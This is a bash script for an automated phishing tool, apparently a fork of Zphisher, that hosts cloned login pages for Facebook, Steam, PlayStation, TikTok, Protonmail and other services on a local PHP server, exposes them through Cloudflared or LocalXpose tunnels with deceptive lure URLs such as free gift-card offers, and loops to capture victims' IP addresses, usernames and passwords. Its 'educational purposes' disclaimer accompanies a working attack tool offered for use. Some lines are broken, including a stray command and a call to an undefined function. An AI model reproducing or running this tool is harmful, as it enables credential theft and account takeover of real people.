#!/bin/bash

##   Zphisher 	: 	Automated Phishing Tool
##   Author 	: 	ENTHERNET
##   Version 	: 	2.3.1
##   Github 	: 	https://github.com/htr-tech/zphisher

git pull



RED="$(printf '\033[31m')"  GREEN="$(printf '\033[32m')"  ORANGE="$(printf '\033[33m')"  BLUE="$(printf '\033[34m')"
MAGENTA="$(printf '\033[35m')"  CYAN="$(printf '\033[36m')"  WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
REDBG="$(printf '\033[41m')"  GREENBG="$(printf '\033[42m')"  ORANGEBG="$(printf '\033[43m')"  BLUEBG="$(printf '\033[44m')"
MAGENTABG="$(printf '\033[45m')"  CYANBG="$(printf '\033[46m')"  WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
RESETBG="$(printf '\e[0m\n')"


if [[ ! -d ".server" ]]; then
	mkdir -p ".server"
fi

if [[ ! -d "data" ]]; then
	mkdir -p "data"
fi

if [[ -d ".server/www" ]]; then
	rm -rf ".server/www"
	mkdir -p ".server/www"
else
	mkdir -p ".server/www"
fi

## Remove logfile
if [[ -e ".server/.loclx" ]]; then
	rm -rf ".server/.loclx"
fi

if [[ -e ".server/.cld.log" ]]; then
	rm -rf ".server/.cld.log"
fi

exit_on_signal_SIGINT() {
	{ printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Interrupted." 2>&1; reset_color; }
	exit 0
}

exit_on_signal_SIGTERM() {
	{ printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Terminated." 2>&1; reset_color; }
	exit 0
}

trap exit_on_signal_SIGINT SIGINT
trap exit_on_signal_SIGTERM SIGTERM


reset_color() {
	tput sgr0
	tput op
	return
}

kill_pid() {
	check_PID="php cloudflared loclx"
	for process in ${check_PID}; do
		if [[ $(pidof ${process}) ]]; then 
			killall ${process} > /dev/null 2>&1 
		fi
	done
}


banner() {
	cat <<- EOF
		${ORANGE}╭━━━┳━╮╱╭┳━━━━┳╮╱╭┳━━━┳━━━┳━╮╱╭┳━━━┳━━━━╮ ╭━━━━┳━━━┳━━━┳╮${WHITE}
		${ORANGE}┃╭━━┫┃╰╮┃┃╭╮╭╮┃┃╱┃┃╭━━┫╭━╮┃┃╰╮┃┃╭━━┫╭╮╭╮┃ ┃╭╮╭╮┃╭━╮┃╭━╮┃┃
		${ORANGE}┃╰━━┫╭╮╰╯┣╯┃┃╰┫╰━╯┃╰━━┫╰━╯┃╭╮╰╯┃╰━━╋╯┃┃╰╯ ╰╯┃┃╰┫┃╱┃┃┃╱┃┃┃${CYAN}
		${ORANGE}┃╭━━┫┃╰╮┃┃╱┃┃╱┃╭━╮┃╭━━┫╭╮╭┫┃╰╮┃┃╭━━╯╱┃┃   ╱╱┃┃╱┃┃╱┃┃┃╱┃┃┃╱
		${ORANGE}┃╰━━┫┃╱┃┃┃╱┃┃╱┃┃╱┃┃╰━━┫┃┃╰┫┃╱┃┃┃╰━━╮╱┃┃   ╱╱┃┃╱┃┃╱┃┃┃╱┃┃┃╱╭╮${GREEN}
		${ORANGE}╰━━━┻╯╱╰━╯╱╰╯╱╰╯╱╰┻━━━┻╯╰━┻╯╱╰━┻━━━╯╱╰╯   ╱╱┃┃╱┃╰━╯┃╰━╯┃╰━╯┃
		${ORANGE}        				  ╱╱╰╯╱╰━━━┻━━━┻━━━╯
		${MANGENTA}
		${ORANGE}  ${GREEN}  -------->(Tool created by Enthernet_Code - Demo)<-------- ${WHITE}

		${CYAN}[${WHITE}N/B${CYAN}]${CYAN} For Educational Purposes${WHITE}
	EOF
}

banner_small() {
	cat <<- EOF
		${BLUE}
		${ORANGE}
╭━━━┳━╮╱╭┳━━━━┳╮╱╭┳━━━┳━━━┳━╮╱╭┳━━━┳━━━━╮
┃╭━━┫┃╰╮┃┃╭╮╭╮┃┃╱┃┃╭━━┫╭━╮┃┃╰╮┃┃╭━━┫╭╮╭╮┃${BLUE}
┃╰━━┫╭╮╰╯┣╯┃┃╰┫╰━╯┃╰━━┫╰━╯┃╭╮╰╯┃╰━━╋╯┃┃╰╯${MAGENTA}
┃╭━━┫┃╰╮┃┃╱┃┃╱┃╭━╮┃╭━━┫╭╮╭┫┃╰╮┃┃╭━━╯╱┃┃
┃╰━━┫┃╱┃┃┃╱┃┃╱┃┃╱┃┃╰━━┫┃┃╰┫┃╱┃┃┃╰━━╮╱┃┃${GREEN}
╰━━━┻╯╱╰━╯╱╰╯╱╰╯╱╰┻━━━┻╯╰━┻╯╱╰━┻━━━╯╱╰╯
╭━━━━┳━━━┳━━━┳╮${WHITE}
┃╭╮╭╮┃╭━╮┃╭━╮┃┃
╰╯┃┃╰┫┃╱┃┃┃╱┃┃┃${CYAN}
╱╱┃┃╱┃┃╱┃┃┃╱┃┃┃╱╭╮${MAGENTA}
╱╱┃┃╱┃╰━╯┃╰━╯┃╰━╯┃${BLACK}
╱╱╰╯╱╰━━━┻━━━┻━━━╯${WHITE} ${GREEN}-------->(Tool created by Enthernet - Demo)<-------- ${WHITE}
	EOF
}


dependencies() {
	echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing required packages..."

	if [[ -d "/data/data/com.termux/files/home" ]]; then
		if [[ ! $(command -v proot) ]]; then
			echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}proot${CYAN}"${WHITE}
			pkg install proot resolv-conf -y
		fi

		if [[ ! $(command -v tput) ]]; then
			echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}ncurses-utils${CYAN}"${WHITE}
			pkg install ncurses-utils -y
		fi
	fi

	if [[ $(command -v php) && $(command -v curl) && $(command -v unzip) ]]; then
		echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Packages already installed."
	else
		pkgs=(php curl unzip)
		for pkg in "${pkgs[@]}"; do
			type -p "$pkg" &>/dev/null || {
				echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}$pkg${CYAN}"${WHITE}
				if [[ $(command -v pkg) ]]; then
					pkg install "$pkg" -y
				elif [[ $(command -v apt) ]]; then
					sudo apt install "$pkg" -y
				elif [[ $(command -v apt-get) ]]; then
					sudo apt-get install "$pkg" -y
				elif [[ $(command -v pacman) ]]; then
					sudo pacman -S "$pkg" --noconfirm
				elif [[ $(command -v dnf) ]]; then
					sudo dnf -y install "$pkg"
				elif [[ $(command -v yum) ]]; then
					sudo yum -y install "$pkg"
				else
					echo -e "\n${RED}[${WHITE}!${RED}]${RED} Unsupported package manager, Install packages manually."
					{ reset_color; exit 1; }
				fi
			}
		done
	fi
}


download() {
	url="$1"
	output="$2"
ls 	file=`basename $url`
	if [[ -e "$file" || -e "$output" ]]; then
		rm -rf "$file" "$output"
	fi
	curl --silent --insecure --fail --retry-connrefused \
		--retry 3 --retry-delay 2 --location --output "${file}" "${url}"

	if [[ -e "$file" ]]; then
		if [[ ${file#*.} == "zip" ]]; then
			unzip -qq $file > /dev/null 2>&1
			mv -f $output .server/$output > /dev/null 2>&1
		elif [[ ${file#*.} == "tgz" ]]; then
			tar -zxf $file > /dev/null 2>&1
			mv -f $output .server/$output > /dev/null 2>&1
		else
			mv -f $file .server/$output > /dev/null 2>&1
		fi
		chmod +x .server/$output > /dev/null 2>&1
		rm -rf "$file"
	else
		echo -e "\n${RED}[${WHITE}!${RED}]${RED} Error occured while downloading ${output}."
		{ reset_color; exit 1; }
	fi
}

 Install Cloudflared
install_cloudflared() {
	if [[ -e ".server/cloudflared" ]]; then
		echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Cloudflared already installed."
	else
		echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing Cloudflared..."${WHITE}
		arch=`uname -m`
		if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm' 'cloudflared'
		elif [[ "$arch" == *'aarch64'* ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64' 'cloudflared'
		elif [[ "$arch" == *'x86_64'* ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64' 'cloudflared'
		else
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-386' 'cloudflared'
		fi
	fi
}

install_localxpose() {
	if [[ -e ".server/loclx" ]]; then
		echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} LocalXpose already installed."
	else
		echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing LocalXpose..."${WHITE}
		arch=`uname -m`
		if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm.zip' 'loclx'
		elif [[ "$arch" == *'aarch64'* ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm64.zip' 'loclx'
		elif [[ "$arch" == *'x86_64'* ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-amd64.zip' 'loclx'
		else
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-386.zip' 'loclx'
		fi
	fi
}


msg_exit() {
	{ clear; banner; echo; }
	echo -e "${GREENBG}${BLACK} Thank you for using this Tool, Hoped they were for legal purposes${RESETBG}\n"
	{ reset_color; exit 0; }
}


about() {
	{ clear; banner; echo; }
	cat <<- EOF
		${GREEN} Author   ${RED}:  ${ORANGE}ENTHERNET CODE
		${GREEN} Github   ${RED}:  ${CYAN}https://github.com/Enthernetcode/Ephisher
		${GREEN} Social   ${RED}:  ${CYAN}UNKOWN

		${WHITE} ${REDBG}Warnings-${RESETBG}
		${CYAN}  This Tool is only for educational purposes  
		 ${RED}!${WHITE}${CYAN} users  will be responsible for 
		  any misuse of this tool ${RED}!${WHITE}
		
		${WHITE} ${CYANBG}Special Thanks to:${RESETBG}
		${GREEN} Those who inspired me

		${RED}[${WHITE}00${RED}]${ORANGE} Main Menu     ${RED}[${WHITE}99${RED}]${ORANGE} Exit

	EOF

	read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"
	case $REPLY in 
		99)
			msg_exit;;
		0 | 00)
			echo -ne "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Returning to main page..."
			{ sleep 1; main_menu; };;
		*)
			echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
			{ sleep 1; about; };;
	esac
}


HOST='127.0.0.1'
PORT='8080'

setup_site() {
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Setting up server..."${WHITE}
	cp -rf .sites/"$website"/* .server/www
	cp -f .sites/ip.php .server/www/
	echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Starting PHP server..."${WHITE}
	cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 & 
}


capture_ip() {
	IP=$(grep -a 'IP:' .server/www/ip.txt | cut -d " " -f2 | tr -d '\r')
	IFS=$'\n'
	echo -e "\n${RED}[${GREEN}>${RED}]${GREEN} Victim's IP : ${BLUE}$IP"
	echo -ne "\n${RED}[${GREEN}>${RED}]${BLUE} Saved in : ${ORANGE}data/ip.txt"
	cat .server/www/ip.txt >> data/ip.txt
}


capture_creds() {
	ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | awk '{print $2}')
	PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | awk -F ":." '{print $NF}')
	IFS=$'\n'
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}data/usernames.dat"
	cat .server/www/usernames.txt >> data/usernames.dat
	echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
}


capture_data() {
	echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit..."
	while true; do
		if [[ -e ".server/www/ip.txt" ]]; then
			echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Victim IP Found !"
			capture_ip
			rm -rf .server/www/ip.txt
		fi
		sleep 0.75
		if [[ -e ".server/www/usernames.txt" ]]; then
			echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Login info Found !!"
			capture_creds
			rm -rf .server/www/usernames.txt
		fi
		sleep 0.75
	done
}

## Start Cloudflared
start_cloudflared() { 
    rm .cld.log > /dev/null 2>&1 &
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
	{ sleep 1; setup_site; }
	echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Cloudflared..."

	if [[ `command -v termux-chroot` ]]; then
		sleep 2 && termux-chroot ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &
	else
		sleep 2 && ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &
	fi

	{ sleep 8; clear; banner_small; }
	
	cldflr_link=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".server/.cld.log")
	cldflr_link1=${cldflr_link#https://}
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$cldflr_link"
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$cldflr_link1"
	capture_data
}

localxpose_auth() {
	./.server/loclx -help > /dev/null 2>&1 &
	sleep 1
	[ -d ".localxpose" ] && auth_f=".localxpose/.access" || auth_f="$HOME/.localxpose/.access" 

	[ "$(./.server/loclx account status | grep Error)" ] && {
		echo -e "\n\n${RED}[${WHITE}!${RED}]${GREEN} Create an account on ${ORANGE}https://localxpose.io/?via=enthernet${GREEN} & copy the token\n"
		sleep 3
		read -p "${RED}[${WHITE}-${RED}]${ORANGE} Input Loclx Token :${ORANGE} " loclx_token
		[[ $loclx_token == "" ]] && {
			echo -e "\n${RED}[${WHITE}!${RED}]${RED} You have to input Localxpose Token." ; sleep 2 ; tunnel_menu
		} || {
			echo -n "$loclx_token" > $auth_f 2> /dev/null
		}
	}
}


start_loclx() {
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
	{ sleep 1; setup_site; localxpose_auth; }
	echo -e "\n"
	read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Loclx Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion
	[[ ${opinion,,} == "y" ]] && loclx_region="eu" || loclx_region="us"
	echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching LocalXpose..."

	if [[ `command -v termux-chroot` ]]; then
		sleep 1 && termux-chroot ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &
	else
		sleep 1 && ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &
	fi

	{ sleep 12; clear; banner_small; }
	loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-Z.]*.loclx.io') #DONE :)
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}http://$loclx_url"
	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$loclx_url"
	capture_data
}


start_localhost() {
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
	setup_site
	{ sleep 1; clear; banner_small; }
	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Successfully Hosted at : ${GREEN}${CYAN}http://$HOST:$PORT ${GREEN}"
	capture_data
}


tunnel_menu() {
	{ clear; banner_small; }
	cat <<- EOF

		${RED}[${WHITE}01${RED}]${ORANGE} Localhost
		${RED}[${WHITE}02${RED}]${ORANGE} Cloudflared  ${RED}[${CYAN}Auto Detects${RED}]
		${RED}[${WHITE}03${RED}]${ORANGE} LocalXpose   ${RED}[${CYAN}NEW! Max 15Min${RED}]

	EOF

	read -p "${RED}[${WHITE}-${RED}]${GREEN} Select a port forwarding service : ${BLUE}"

	case $REPLY in 
		1 | 01)
			start_localhost;;
		2 | 02)
			start_cloudflared;;
		3 | 03)
			start_loclx;;
		4)
			echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
			{ sleep 1; tunnel_menu; };;
	esac
}


site_facebook() {
	cat <<- EOF

		${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page
		${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page
		${RED}[${WHITE}03${RED}]${ORANGE} Fake Security Login Page
		${RED}[${WHITE}04${RED}]${ORANGE} Facebook Messenger Login Page

	EOF

	read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

	case $REPLY in 
		1 | 01)
			website="facebook"
			mask='http://blue-verified-badge-for-facebook-free'
			tunnel_menu;;
		2 | 02)
			website="fb_advanced"
			mask='http://vote-for-the-best-social-media'
			tunnel_menu;;
		3 | 03)
			website="fb_security"
			mask='http://make-your-facebook-secured-and-free-from-hackers'
			tunnel_menu;;
		4 | 04)
			website="fb_messenger"
			mask='http://get-messenger-premium-features-free'
			tunnel_menu;;
		*)
			echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
			{ sleep 1; clear; banner_small; site_facebook; };;
	esac
}

## Vk
site_vk() {
	cat <<- EOF

		${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page
		${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page

	EOF

	read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

	case $REPLY in 
		1 | 01)
			website="vk"
			mask='http://vk-premium-real-method-2020'
			tunnel_menu;;
		2 | 02)
			website="vk_poll"
			mask='http://vote-for-the-best-social-media'
			tunnel_menu;;
		*)
			echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
			{ sleep 1; clear; banner_small; site_vk; };;
	esac
}

## Menu
main_menu() {
	{ clear; banner; echo; }
	cat <<- EOF
		${RED}[${GREEN}<<${RED}]${BLUE} Select A Script For Phishing Attack ${RED}[${GREEN}>>${RED}]${ORANGE}

		${RED}[${CYAN}01${RED}]${BLUE} Facebook      ${RED}[${CYAN}11${RED}]${ORANGE} Twitch       ${RED}[${CYAN}21${RED}]${BLUE} DeviantArt
		${RED}[${CYAN}02${RED}]${BLUE} Instagram     ${RED}[${CYAN}12${RED}]${ORANGE} Pinterest    ${RED}[${CYAN}22${RED}]${BLUE} Badoo
		${RED}[${CYAN}03${RED}]${BLUE} Google        ${RED}[${CYAN}13${RED}]${ORANGE} Snapchat     ${RED}[${CYAN}23${RED}]${BLUE} Origin
		${RED}[${CYAN}04${RED}]${BLUE} Microsoft     ${RED}[${CYAN}14${RED}]${ORANGE} Linkedin     ${RED}[${CYAN}24${RED}]${BLUE} DropBox	
		${RED}[${CYAN}05${RED}]${BLUE} Netflix       ${RED}[${CYAN}15${RED}]${ORANGE} Ebay         ${RED}[${CYAN}25${RED}]${BLUE} Yahoo		
		${RED}[${CYAN}06${RED}]${BLUE} Paypal        ${RED}[${CYAN}16${RED}]${ORANGE} Quora        ${RED}[${CYAN}26${RED}]${BLUE} Wordpress
		${RED}[${CYAN}07${RED}]${BLUE} Steam         ${RED}[${CYAN}17${RED}]${ORANGE} Protonmail   ${RED}[${CYAN}27${RED}]${BLUE} Yandex			
		${RED}[${CYAN}08${RED}]${BLUE} Twitter       ${RED}[${CYAN}18${RED}]${ORANGE} Spotify      ${RED}[${CYAN}28${RED}]${BLUE} StackoverFlow
		${RED}[${CYAN}09${RED}]${BLUE} Playstation   ${RED}[${CYAN}19${RED}]${ORANGE} Reddit       ${RED}[${CYAN}29${RED}]${BLUE} Vk
		${RED}[${CYAN}10${RED}]${BLUE} Tiktok        ${RED}[${CYAN}20${RED}]${ORANGE} Adobe        ${RED}[${CYAN}30${RED}]${BLUE} XBOX
		${RED}[${CYAN}31${RED}]${BLUE} Mediafire     ${RED}[${CYAN}32${RED}]${ORANGE} Gitlab       ${RED}[${WHITE}33${RED}]${BLUE} Github
		${RED}[${CYAN}34${RED}]${BLUE} Discord       ${RED}[${CYAN}35${RED}]${ORANGE} Crypto_Wallets "(testting)"

		${RED}[${ORANGE}99${RED}]${GREEM} ABOUT         ${RED}[${ORANGE}00${RED}]${GREEN} Exit

	EOF
	
	read -p "${BLUE}>${ORANGE}>${BLUE}>${GREEN} CHOOSE  AN OPTION : ${GREEN}"

	case $REPLY in
                1 | 01)
                        site_facebook;;
                2 | 02)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                3 | 03)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                4 | 04)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                5 | 05)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                6 | 06)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                7 | 07)
                        website="steam"
                        mask='http://steam-500-usd-gift-card-free'
                        tunnel_menu;;
                8 | 08)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                9 | 09)
                        website="playstation"
                        mask='http://playstation-500-usd-gift-card-free'
                        tunnel_menu;;
                10)
                        website="tiktok"
                        mask='http://tiktok-free-liker'
                        tunnel_menu;;
                11)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                12)
                        website="pinterest"
                        mask='http://get-a-premium-plan-for-pinterest-free'
                        tunnel_menu;;
                13)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                14)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                15)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                16)
                        website="quora"
                        mask='http://quora-premium-for-free'
                        tunnel_menu;;
                17)
                        website="protonmail"
                        mask='http://protonmail-pro-basics-for-free'
                        tunnel_menu;;
                18)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                19)
                        website="reddit"
                        mask='http://reddit-official-verified-member-badge'
                        tunnel_menu;;
                20)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                21)
                        website="deviantart"
                        mask='http://get-500-usd-free-to-your-acount'
                        tunnel_menu;;
                22)
                        website="badoo"
                        mask='http://get-500-usd-free-to-your-acount'
                        tunnel_menu;;
                23)
			website="origin"
                        mask='http://get-500-usd-free-to-your-acount'
                        tunnel_menu;;
                24)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                25)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                26)
                        website="wordpress"
                        mask='http://unlimited-wordpress-traffic-free'
                        tunnel_menu;;
                27)
                        website="yandex"
                        mask='http://grab-mail-from-anyother-yandex-account-free'
                        tunnel_menu;;
                28)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                29)
                        site_vk;;
                30)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                31)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                32)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                33)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                34)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                35)
                        echo -ne "${GREEN}Try out the ${BLUE} Paid version to enjoy unlimited ${RED}acsess";;
                99)
                        about;;
                0 | 00 )
                        msg_exit;;
                *)
                        echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
                        { sleep 1; main_menu; };;

        esac
}

## Main
kill_pid
dependencies
install_ngrok
install_cloudflared
install_localxpose
main_menu

